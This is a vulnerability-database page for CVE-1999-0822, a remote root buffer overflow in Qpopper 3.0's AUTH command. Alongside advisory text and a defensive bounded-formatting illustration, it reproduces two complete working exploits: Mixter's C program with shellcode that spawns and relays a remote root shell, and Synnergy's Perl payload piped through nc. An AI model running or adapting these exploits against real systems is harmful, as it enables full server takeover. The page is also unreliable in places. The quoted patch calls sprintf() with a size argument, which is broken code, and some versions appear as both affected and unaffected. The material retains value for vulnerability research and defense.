CVE-1999-0822
CVSS 10.0
Published: 1999-11-30 00:00:00
Revised: 2008-09-09 08:36:00

[Original] Buffer overflow in Qpopper (qpop) 3.0 allows remote root access via AUTH command.


[CNNVD] Qualcomm qpopper AUTH command remote buffer overflow vulnerability (CNNVD-199911-082)

qpopper is Qualcomm's POP3 server and is free software.
A buffer overflow has been found in Qualcomm qpopper 3.x. A remote attacker can use it to gain root privileges on the server.
When an AUTH command with an overlong argument is sent to the qpopper server, an overflow occurs. The problem is in pop_msg.c around line 68, where vsprintf() or sprintf() is called without bounds checking. Because the process runs as root, an intruder can construct specific data, pass it to the server, and execute commands with root privileges.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may bring the whole system down]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:qualcomm:qpopper:3.0b20
cpe:/a:qualcomm:qpopper:3.0

- OVAL (technical details for detection)

No relevant OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0822
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0822
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-082
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/830
(UNKNOWN)  BID  830

- Vulnerability information

Qualcomm qpopper AUTH command remote buffer overflow vulnerability
Critical  Boundary condition error
1999-11-30 00:00:00 2005-10-20 00:00:00
Remote

qpopper is Qualcomm's POP3 server and is free software.
A buffer overflow has been found in Qualcomm qpopper 3.x. A remote attacker can use it to gain root privileges on the server.
When an AUTH command with an overlong argument is sent to the qpopper server, an overflow occurs. The problem is in pop_msg.c around line 68, where vsprintf() or sprintf() is called without bounds checking. Because the process runs as root, an intruder can construct specific data, pass it to the server, and execute commands with root privileges.

- Advisories and patches

Workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Stop using the program until the vulnerability has been patched.
Vendor patch:
Qualcomm
--------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://www.eudora.com/freeware/qpop.html

- Vulnerability information (19645)

Qualcomm qpopper 3.0/3.0 b20 Remote Buffer Overflow Vulnerability (1) (EDBID:19645)
unix remote
1999-11-30 Verified
0 Mixter
N/A
source: http://www.securityfocus.com/bid/830/info

There is a buffer overflow vulnerability present in current (3.x) versions of Qualcomm popper daemon. These vulnerabilities are remotely exploitable and since the daemon runs as root, the host running qpopper can be completely compromised anonymously. The problem is in pop_msg.c, around line 68 and is the result of vsprintf() or sprintf() calls without bounds checking.

/*
 * Qpopper 3.0b remote exploit for x86 Linux (tested on RedHat/2.0.38)
 *
 * Dec 1999 by Mixter <mixter@newyorkoffice.com> / http://1337.tsx.org
 *
 * Exploits pop_msg buffer overflow to spawn a remote root shell.
 * This probably works with the old qpop2 code for bsd, solaris anyone?
 * 
 * WARNING: YOU ARE USING THIS SOFTWARE ON YOUR OWN RISK. THIS IS A
 * PROOF-OF-CONCEPT PROGRAM AND YOU TAKE FULL RESPONSIBILITY FOR WHAT YOU
 * DO WITH IT! DO NOT ABUSE THIS FOR ILLICIT PURPOSES!
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>

#define NOP		0x90
#define LEN		1032
#define CODESTART	880
#define RET		0xbfffd655

/* x86 linux shellcode. this can be a simple execve to /bin/sh on all
   systems, but MUST NOT contain the characters 'x17' or 'x0c' because
   that would split the exploit code into separate arg buffers        */

char *shellcode =
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab"
"\x89\xfa\x31\xc0\xab\xb0\x04\x04\x07\xcd\x80\x31\xc0\x89\xc3\x40\xcd\x80"
"\xe8\xd9\xff\xff\xff/bin/sh";

unsigned long resolve (char *);
void term (int, int);
unsigned long get_sp ();

int 
main (int argc, char **argv)
{
  char buffer[LEN];
  char *codeptr = shellcode;
  long retaddr = RET;
  int i, s;
  struct sockaddr_in sin;

  if (argc < 2)
    {
      printf ("usage: %s <host> [offset]\n", argv[0]);
      printf ("use offset -1 to try local esp\n");
      exit (0);
    }

  if (argc > 2)
    {
      if (atoi (argv[2]) == -1)
	{
	  /* 8000 = approx. byte offset to qpopper's top of stack
	     at the time it prints out the auth error message */
	  retaddr = get_sp () - 8000 - LEN;
	  printf ("Using local esp as ret address...\n");
	}
      retaddr += atoi (argv[2]);
    }

  for (i = 0; i < LEN; i++)
    *(buffer + i) = NOP;

  for (i = CODESTART + 2; i < LEN; i += 4)
    *(int *) &buffer[i] = retaddr;

  for (i = CODESTART; i < CODESTART + strlen (shellcode); i++)
    *(buffer + i) = *(codeptr++);

  buffer[0] = 'A';
  buffer[1] = 'U';
  buffer[2] = 'T';
  buffer[3] = 'H';
  buffer[4] = ' ';

  printf ("qpop 3.0 remote root exploit (linux) by Mixter\n");
  printf ("[return address: 0x%lx buffer size: %d code size: %d]\n",
	  retaddr, strlen (buffer), strlen (shellcode));

  fflush (0);

  sin.sin_family = AF_INET;
  sin.sin_port = htons (110);
  sin.sin_addr.s_addr = resolve (argv[1]);
  s = socket (AF_INET, SOCK_STREAM, 0);

  if (connect (s, (struct sockaddr *) &sin, sizeof (struct sockaddr)) < 0)
    {
      perror ("connect");
      exit (0);
    }

  switch (write (s, buffer, strlen (buffer)))
    {
    case 0:
    case -1:
      fprintf (stderr, "write error: %s\n", strerror (errno));
      break;
    default:
      break;
    }
  write (s, "\n\n", 1);
  term (s, 0);

  return 0;
}

unsigned long
resolve (char *host)
{
  struct hostent *he;
  struct sockaddr_in tmp;
  if (inet_addr (host) != -1)
    return (inet_addr (host));
  he = gethostbyname (host);
  if (he)
    memcpy ((caddr_t) & tmp.sin_addr.s_addr, he->h_addr, he->h_length);
  else
    {
      perror ("gethostbyname");
      exit (0);
    }
  return (tmp.sin_addr.s_addr);
}

unsigned long
get_sp (void)
{
  __asm__ ("movl %esp, %eax");
}

void
term (int p, int c)
{
  char buf[LEN];
  fd_set rfds;
  int i;

  while (1)
    {
      FD_ZERO (&rfds);
      FD_SET (p, &rfds);
      FD_SET (c, &rfds);
      if (select ((p > c ? p : c) + 1, &rfds, NULL, NULL, NULL) < 1)
	return;
      if (FD_ISSET (c, &rfds))
	{
	  if ((i = read (c, buf, sizeof (buf))) < 1)
	    exit (0);
	  else
	    write (p, buf, i);
	}
      if (FD_ISSET (p, &rfds))
	{
	  if ((i = read (p, buf, sizeof (buf))) < 1)
	    exit (0);
	  else
	    write (c, buf, i);
	}
    }
}


- Vulnerability information (19646)

Qualcomm qpopper 3.0/3.0 b20 Remote Buffer Overflow Vulnerability (2) (EDBID:19646)
unix remote
1999-11-30 Verified
0 Synnergy Networks
N/A
source: http://www.securityfocus.com/bid/830/info
 
There is a buffer overflow vulnerability present in current (3.x) versions of Qualcomm popper daemon. These vulnerabilities are remotely exploitable and since the daemon runs as root, the host running qpopper can be completely compromised anonymously. The problem is in pop_msg.c, around line 68 and is the result of vsprintf() or sprintf() calls without bounds checking.

#!/usr/bin/perl
# *** Synnergy Networks

# * Description:
#
# Remote buffer overflow exploit for QPOP 3.0b<=20 
# running on Linux.
# (based on code by sk8@lucid-solutions.com)

# * Author:
#
# headflux (hf@synnergy.net)
# Synnergy Networks (c) 1999,  http://www.synnergy.net

# * Usage:
# ./qpop-linux.pl <offset> | nc -v <hostname> 110

# *** Synnergy Networks

$nop    = "\x90";
#$offset        = 0;

$shell  = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa";
$shell  .= "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04";
$shell  .= "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff";
$shell  .= "\xff\xff/bin/sh";

#$i     = 0;
$buflen = 990;
$ret    = 0xbfffd304;
$cmd    = "AUTH ";

if(defined $ARGV[0])
{
        $offset = $ARGV[0];
}

$buf = $nop x $buflen;
substr($buf, 0, length($cmd))		= "$cmd";
substr($buf, 800, length($shell))       = "$shell";

for ($i=800+length($shell) + 2; $i < $buflen - 4; $i += 4)
{
        substr($buf, $i, length($ret + offset)) = pack(l,$ret + $offset);
}

# substr($buf, $buflen - 2, 1)  = "\n";
# substr($buf, $buflen - 1, 1)  = "\n";

#$buf   .= "\n";

printf STDOUT "$buf\n";

# EndOfFile

- Vulnerability information

6992
Qpopper pop_msg.c AUTH Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A remote overflow exists in Qpopper. The Qpopper fails to check the boundary in "pop_msg.c" function, resulting in a buffer overflow. With a specially crafted request, a remote attacker can overflow a buffer and gain root privileges on the system, resulting in a loss of confidentiality and integrity.

- Timeline

1999-11-30 Unknown
1999-11-30 Unknown

- Solution

Upgrade to version 3.0.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

- Vulnerability information

Qualcomm qpopper Remote Buffer Overflow Vulnerability
Boundary Condition Error 830
Yes No
1999-11-30 12:00:00 2009-07-11 12:56:00
First posted to BugTraq by Mixter <mixter@newyorkoffice.com> on Nov 30, 1999.

- Affected software versions

Qualcomm qpopper 3.0 b20
Qualcomm qpopper 3.0
Qualcomm qpopper 2.53
Qualcomm qpopper 2.52
Qualcomm qpopper 2.4

- Unaffected software versions

Qualcomm qpopper 2.53
Qualcomm qpopper 2.52
Qualcomm qpopper 2.4

- Discussion

There is a buffer overflow vulnerability present in current (3.x) versions of Qualcomm popper daemon. These vulnerabilities are remotely exploitable and since the daemon runs as root, the host running qpopper can be completely compromised anonymously. The problem is in pop_msg.c, around line 68 and is the result of vsprintf() or sprintf() calls without bounds checking.
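The defect described above, as an added illustration written for this page rather than qpopper's own code: a formatted message is appended to a fixed-size reply line with vsprintf(), which cannot know how much room is left, next to a hardened version that derives the bound from the space remaining and reports truncation. `LINE_LEN`, `append_msg_unsafe`, `append_msg_safe` and `build_err_reply` are assumed names; qpopper's real buffer size and function names are not reproduced.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of one POP3 response line (qpopper's own MAXLINELEN is not
 * reproduced here). */
#define LINE_LEN 256

/* Vulnerable shape from the advisory: the message is appended after the
 * reply prefix with vsprintf(), which has no idea how much of `line` is
 * still free. A long %s argument, such as an overlong AUTH parameter echoed
 * back in the error text, runs straight past the end of the buffer.
 * Shown for contrast only; nothing below calls it. */
void append_msg_unsafe(char *line, const char *format, ...)
{
    va_list ap;
    va_start(ap, format);
    vsprintf(line + strlen(line), format, ap);
    va_end(ap);
}

/* Hardened shape: work out how much of `line` is actually free after the
 * existing prefix and hand exactly that to vsnprintf(), which always
 * NUL-terminates when given a size > 0. Returns 0 when the message fit,
 * 1 when it was truncated, -1 when the prefix was not terminated or the
 * format failed. */
int append_msg_safe(char *line, size_t line_size, const char *format, ...)
{
    const char *nul = memchr(line, '\0', line_size);
    if (nul == NULL)
        return -1;
    size_t used = (size_t)(nul - line);
    size_t room = line_size - used;      /* >= 1, includes the terminator */

    va_list ap;
    va_start(ap, format);
    int n = vsnprintf(line + used, room, format, ap);
    va_end(ap);

    if (n < 0)
        return -1;
    return (size_t)n >= room;            /* n is the length it wanted */
}

/* Builds the "-ERR ..." reply a server sends for an AUTH mechanism it does
 * not support, echoing the client-supplied name the way the vulnerable
 * code path did. Returns append_msg_safe()'s status. */
int build_err_reply(char *line, size_t line_size, const char *mechanism)
{
    snprintf(line, line_size, "-ERR ");
    return append_msg_safe(line, line_size,
                           "Unknown AUTH mechanism %s", mechanism);
}

int main(void)
{
    char line[LINE_LEN];
    char overlong[600];

    /* Constructed inputs: a normal mechanism name and a 599-byte one. */
    build_err_reply(line, sizeof line, "CRAM-MD5");
    printf("%s\n", line);

    memset(overlong, 'A', sizeof overlong - 1);
    overlong[sizeof overlong - 1] = '\0';
    int truncated = build_err_reply(line, sizeof line, overlong);
    printf("truncated=%d length=%zu\n", truncated, strlen(line));
    return 0;
}
```

The point of `append_msg_safe` is that the bound comes from the buffer, not from a constant: a caller who has already written a long prefix still gets a reply that fits, and the return value lets the server notice and log the truncation rather than silently dropping part of the message.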

- Exploit

An exploit has been made available.

- Solution

The newest version, qpopper3.0b22 (which is patched), is available at:

ftp://ftp.qualcomm.com/eudora/servers/unix/popper/

This is a temporary patch, provided by Mixter <mixter@newyorkoffice.com> in his post to BugTraq.
# apply this in the qpopper3.0b20/popper/ directory with patch < qp3b20.patch
--- pop_msg.c.old Mon Nov 29 23:42:03 1999
+++ pop_msg.c Mon Nov 29 23:52:08 1999
@@ -65,7 +65,7 @@
/* Append the message (formatted, if necessary) */
if (format) {
#ifdef HAVE_VPRINTF
- vsprintf(mp,format,ap);
+ vsnprintf(mp,MAXLINELEN - 100, format,ap);
#else
# ifdef PYRAMID
arg1 = va_arg(ap, char *);
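Review bot: the bound passed to vsnprintf() on the `+` line, `MAXLINELEN - 100`, is a fixed constant that does not depend on where `mp` points. The comment above the hunk says the message is appended, so `mp` already sits past the reply's prefix and the space actually left is smaller than that constant; a prefix longer than the 100-byte margin would still let the write run past the end of the line. Derive the size from the buffer's end (the remaining bytes after `mp`) and check vsnprintf()'s return value so a truncated reply is detected rather than assumed impossible.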
@@ -74,9 +74,9 @@
arg4 = va_arg(ap, char *);
arg5 = va_arg(ap, char *);
arg6 = va_arg(ap, char *);
- (void)sprintf(mp,format, arg1, arg2, arg3, arg4, arg5, arg6);
+ (void)sprintf(mp,MAXLINELEN - 100, format, arg1, arg2, arg3, arg4, arg5, arg6);
# else
- (void)sprintf(mp,format,((int *)ap)[0],((int *)ap)[1],((int *)ap)[2],
+ (void)sprintf(mp,MAXLINELEN - 100, format,((int *)ap)[0],((int *)ap)[1],((int *)ap)[2],
((int *)ap)[3],((int *)ap)[4]);
# endif
#endif
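Review bot: both `+` lines in this hunk pass the size `MAXLINELEN - 100` to sprintf(), which has no size parameter. The integer lands in the `format` slot and the real format string is shifted into the variadic arguments, so this branch will not compile cleanly and, if forced through, formats from a bogus pointer and still writes without any bound. Use snprintf() here to match the HAVE_VPRINTF branch, e.g. `(void)snprintf(mp, MAXLINELEN - 100, format, arg1, arg2, arg3, arg4, arg5, arg6);`, and apply the same remaining-space bound instead of a fixed constant.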

- References
